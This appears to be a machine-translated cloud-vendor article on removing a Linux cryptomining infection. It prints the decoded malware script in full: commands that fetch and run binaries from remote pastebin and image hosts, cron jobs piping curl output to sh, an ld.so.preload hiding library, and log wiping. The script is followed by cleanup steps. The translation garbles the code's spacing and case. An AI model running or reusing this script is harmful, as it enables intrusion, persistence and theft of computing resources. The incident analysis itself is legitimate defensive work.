Mining virus qw3xt. 2 Final Solution

Last Update:2018-10-27 Source: Internet

Author: User

Tags pkill xmrig

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Transferred from: 82347473

1. CPU 100%, use top to view CPU

2. Delete the CPU or 100% of the process.

3. It is estimated that the process is hidden.

4. One execution task is added to the scheduled task.

5: Open the connection https://pastebin.com/raw/xbY7p5Tb to get the following content

6: Open the https://pastebin.com/raw/uuYVPLXd, found a base64 encoded string,

7. Use base64 to decode the content and obtain the following script content.

#! /Bin/bash

Shell =/bin/sh

Path =/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Function kills (){

Pkill-F sourplum

Pkill wnkyg & pkill DDG * & Rm-RF/tmp/wnkyg

Rm-RF/boot/GRUB/deamon & Rm-RF/boot/GRUB/disk_genius

Rm-RF/tmp/* index_bak *

Rm-RF/tmp/* httpd. conf *

Rm-RF/tmp/* httpd. conf

Rm-RF/tmp/a7b0000c270

PS auxf | grep-V grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 8080" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 3333" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "monerohash.com" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "/tmp/a7b316c270" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 6666" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 7777" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 443" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "stratum.f2pool.com: 8888" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmrpool. eu" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmrig" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmrigdaemon" | awk '{print $2}' | xargs kill-9

PS auxf | grep-V grep | grep "xmrigminer" | awk '{print $2}' | xargs kill-9

Pkill-F biosetjenkins

Pkill-F anxqv. Yam

Pkill-F xmrigdaemon

Pkill-F xmrigminer

Pkill-F xmrig

Pkill-F loopback

Pkill-F apaceha

Pkill-F cryptonight

Pkill-F Stratum

Pkill-F mixnerdx

Pkill-F quit medl

Pkill-F jnkihgjn

Pkill-F irqba2anc1

Pkill-F irqba5xnc1

Pkill-F irqbnc1

Pkill-F ir29xc1

Pkill-F Conns

Pkill-F irqbalance

Pkill-F crypto-pool

Pkill-F minexmr

Pkill-F xjnrj

Pkill-F nxlai

Pkill-F bi5zj

Pkill-F askdljlqw

Pkill-F minerd

Pkill-F minergate

Pkill-F guard. Sh

Pkill-F ysaydh

Pkill-F bonns

Pkill-F donns

Pkill-F kxjd

Pkill-F duck. Sh

Pkill-F Bonn. Sh

Pkill-F conn. Sh

Pkill-F kworker34

Pkill-F kW. Sh

Pkill-F pro. Sh

Pkill-F polkitd

Pkill-F acpid

Pkill-F icb5o

Pkill-F nopxi

Pkill-F irqbalanc1

Pkill-F minerd

Pkill-F i586

Pkill-F GDDR

Pkill-F mstxmr

Pkill-F ddg.2011

Pkill-F wnkyg

Pkill-F deamon

Pkill-F disk_genius

Pkill-F sourplum

Pkill-F bashx

Pkill-F bashg

Pkill-F bashe

Pkill-F bashf

Pkill-F bashh

Pkill-F xbashy

Pkill-F libapache

Rm-RF/tmp/httpd. conf

Rm-RF/tmp/Conn

Rm-RF/tmp/root. sh/tmp/pools.txt/tmp/libapache/tmp/config. JSON/tmp/bashf/tmp/bashg/tmp/libapache

Rm-RF/tmp/Conns

Rm-F/tmp/IRQ. Sh

Rm-F/tmp/irqbalanc1

Rm-F/tmp/IRQ

Rm-F/tmp/kworkerds/bin/config. JSON

Netstat-anp | grep 69.28.55.86: 443 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 3333 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 4444 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 5555 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 6666 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 7777 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 3347 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 14444 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Netstat-anp | grep 5.196.225.222 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

Y = $ (PS aux | grep-V grep | grep kworkerds | WC-l)

If [$ {y}-EQ 0]; then

Netstat-anp | grep 13531 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9

}

Function System (){

If [! -F "/bin/httpdns"]; then

Curl-fssl https://pastebin.com/raw/698D7kZU-O/bin/httpdns & chmod 755/bin/httpdns

If [! -F "/bin/httpdns"]; then

Wget https://pastebin.com/raw/698D7kZU-O/bin/httpdns & chmod 755/bin/httpdns

Sed-I '$ D'/etc/crontab & Echo-e "**/6 *** root/bin/sh/bin/httpdns">/etc/crontab

}

Function top (){

If [! -F "/usr/local/lib/libntp. So"]; then

Curl-fssl http://thyrsi.com/t6/365/1535595427x-1404817712.jpg-O/usr/local/lib/libntp. So & chmod 755/usr/local/lib/libntp. So

If [! -F "/usr/local/lib/libntp. So"]; then

Wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg-O/usr/local/lib/libntp. So & chmod 755/usr/local/lib/libntp. So

If [! -F "/etc/lD. So. preload"]; then

Echo/usr/local/lib/libntp. So>/etc/lD. So. Preload

Else

Sed-I '$ D'/etc/lD. So. preload & Echo/usr/local/lib/libntp. So>/etc/lD. So. Preload

Touch-acmr/bin/sh/etc/lD. So. Preload

Touch-acmr/bin/sh/usr/local/lib/libjdk. So

Touch-acmr/bin/sh/usr/local/lib/libntp. So

Echo 0>/var/spool/mail/root

Echo 0>/var/log/wtmp

Echo 0>/var/log/secure

Echo 0>/var/log/cron

}

Function Python (){

Nohup Python-c "Import base64; Exec (base64.b64decode ('pipeline authorization')">/dev/null 2> & 1 &

Touch/tmp/. tmpa

}

Function echocron (){

Echo-e "*/10 * root/bin/chmod 755/usr/bin/curl &/usr/bin/curl-fssl https://pastebin.com/raw/xbY7p5Tb | sh \ n ## ">/etc/cron. d/root

Echo-e "*/30 */usr/bin/curl-fssl https://pastebin.com/raw/xbY7p5Tb | sh \ n #">/var/spool/cron/root

Mkdir-P/var/spool/cron/crontabs

Echo-e "**/10 ***/usr/bin/curl-fssl https://pastebin.com/raw/xbY7p5Tb | sh \ n #">/var/spool/cron/crontabs/root

Touch-acmr/bin/sh/etc/cron. d/root

Touch-acmr/bin/sh/var/spool/cron/crontabs

Touch-acmr/bin/sh/var/spool/cron/root

Touch-acmr/bin/sh/var/spool/cron/crontabs/root

}

Function downloadrun (){

PS = $ (netstat-anp | grep 13531 | WC-l)

If [$ {PS}-EQ 0]; then

If [! -F "/tmp/kworkerds"]; then

Curl-fssl http://thyrsi.com/t6/358/1534495127x-1404764247.jpg-O/tmp/kworkerds & chmod + x/tmp/kworkerds

If [! -F "/tmp/kworkerds"]; then

Wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg-O/tmp/kworkerds & chmod + x/tmp/kworkerds

Nohup/tmp/kworkerds>/dev/null 2> & 1 &

Else

Nohup/tmp/kworkerds>/dev/null 2> & 1 &

}

Function downloadrunxm (){

PM = $ (netstat-anp | grep 13531 | WC-l)

If [$ {pm}-EQ 0]; then

If [! -F "/bin/config. JSON"]; then

Curl-fssl http://thyrsi.com/t6/358/1534496022x-1404764583.jpg-O/bin/config. JSON & chmod + x/bin/config. JSON

If [! -F "/bin/config. JSON"]; then

Wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg-O/bin/config. JSON & chmod + x/bin/config. JSON

If [! -F "/bin/kworkerds"]; then

Curl-fssl http://thyrsi.com/t6/358/1534491798x-1404764420.jpg-O/bin/kworkerds & chmod + x/bin/kworkerds

If [! -F "/bin/kworkerds"]; then

Wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg-O/bin/kworkerds & chmod + x/bin/kworkerds

Nohup/bin/kworkerds>/dev/null 2> & 1 &

Else

Nohup/bin/kworkerds>/dev/null 2> & 1 &

}

Update = $ (curl-fssl -- connect-Timeout 120 https://pastebin.com/raw/C4ZhQFrH)

If [$ {update} X = "Update" X]; then

Rm-RF/tmp/lock */bin/kworkerds/bin/config. JSON/tmp/kworkerds/root/kworkerds

Echocron

Else

If [! -F "/tmp/. tmpa"]; then

Rm-RF/tmp/. tmp

Python

Kills

Downloadrun

Echocron

System

Top

Sleep 10

Port = $ (netstat-anp | grep 13531 | WC-l)

If [$ {port}-EQ 0]; then

Downloadrunxm

8: Final Solution Based on this script

A: Delete the scheduled task first.

Rm-RF/etc/cron. d/root

Rm-RF/var/spool/cron/crontabs

Rm-RF/bin/sh/var/spool/cron/root

B: delete and run the script after the system is restarted.

Rm-RF/bin/httpdns

C: Delete the mining execution script.

Rm-RF/tmp/kworkerds

D: Delete the script for repairing the top display command (as a result, the top query does not process this mining process)

Rm-RF/usr/local/lib/libntp. So

E: Delete the python execution file.

Rm-RF/tmp/. tmpa

F: use the top command to find out the CPU-consuming process.

7: Kill this process

9: Modify the redis password. It is best to change the bind to 127.0.0.1.

Mining virus qw3xt. 2 Final Solution

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More